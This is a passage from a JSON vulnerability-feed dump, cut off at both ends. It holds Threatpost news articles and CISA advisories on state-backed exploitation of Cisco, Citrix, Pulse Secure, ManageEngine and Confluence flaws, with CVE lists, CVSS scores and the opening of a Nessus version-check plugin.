between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", "id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. \n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. Additionally, CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:49", "description": "Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the [Zoho security update](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for more information and apply the [patch](<https://www.manageengine.com/products/desktop-central/service-packs.html>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update on ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-05-04T15:28:24", "description": "According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is prior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "href": "https://www.tenable.com/plugins/nessus/153147", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153147);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2021-40539\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"IAVA\", value:\"2021-A-0561\");\n\n script_name(english:\"ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is\nprior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An\nunauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build\nnumber.\");\n # https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74285241\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine ADSelfService Plus build 6114 or 